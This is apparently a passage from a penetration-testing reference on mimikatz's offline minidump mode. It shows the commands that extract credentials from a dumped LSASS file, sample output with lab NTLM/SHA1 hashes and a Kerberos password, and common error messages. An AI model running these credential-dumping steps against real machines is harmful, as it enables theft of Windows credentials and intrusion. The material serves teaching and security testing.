minidump
sekurlsa::minidump can be used against a dumped LSASS process file and does not require administrative privileges. It is considered an "offline" dump.
mimikatz # sekurlsa::minidump file.dmp
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 3113147 (00000000:002f80bb)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 13/10/2021 20:58:06
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN10$
* Domain : hacklab
* NTLM : 2c60cae5c83d27b349e98662de463dfc
* SHA1 : fd6e6c6616156dac734f87d1eec386fa29537d89
tspkg :
wdigest :
* Username : WIN10$
* Domain : hacklab
* Password : (null)
kerberos :
* Username : WIN10$
* Domain : hacklab.local
* Password : 8us/0-5sE3:_bd4\B+nEqpI#j,[avKJ'7l5RpDew]EEXya=tZq7g,jAifx%-sgv)[email protected]];gmb=gSE4K?"D\B+ CBW>vD5*/k71q'iI#V4$otG4t9R[
ssp :
credman :
cloudap : KO
According to Benjamin, the following errors might be raised:
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B): the minidump comes from a Windows NT of another major version (NT5 vs NT6).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B): the minidump comes from a Windows NT of another architecture (x86 vs x64).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002): the minidump file was not found (check the path).